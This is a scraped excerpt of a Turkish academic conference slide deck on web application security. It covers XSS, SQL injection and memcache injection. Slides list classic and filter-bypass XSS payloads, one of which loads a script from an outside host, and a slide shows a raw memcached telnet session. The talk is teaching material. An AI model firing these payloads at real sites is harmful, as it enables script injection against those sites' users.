More Related Content
Similar to Web Uygulama Güvenliği (Akademik Bilişim 2016) (20)
Web Uygulama Güvenliği (Akademik Bilişim 2016)
- 3. #! cat index
• Cross-site Scripting (XSS)
• SQL Injection
• Memcache Injection
• Upload Authentication
- 13. #! cat classic-xss-payloads
• <script>alert(1)</script>
• <img src="javascript:alert('XSS');">
• <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
• <SCRIPT a=">" SRC="http://omercitak.com/xss.js"></SCRIPT>
• <video src=1 onerror=alert(1)>
• <audio src=1 onerror=alert(1)>
• <img src=x onerror=alert(1)">
- 14. #! cat xss-bypass-payloads
• <scrscriptipt>alalertert(1)</scrscriptipt>
• alert(String.fromCharCode(88,83,83))
• <IMG SRC=ja…………….')>
• <IMG SRC='vbscript:msgbox("XSS")'>
- 29. #! cat time-based-sql-injection
• Ya arka planda çıktı vermeyen bir query çalışıyor ise?
– Count Query
– Update Query
– Insert Query
– Delete Query
– Relationship Query
- 38. #! telnet 127.0.0.1 11211
> set key 0 10 5
> value
< STORED
> get key
< VALUE key 0 5
< value
< END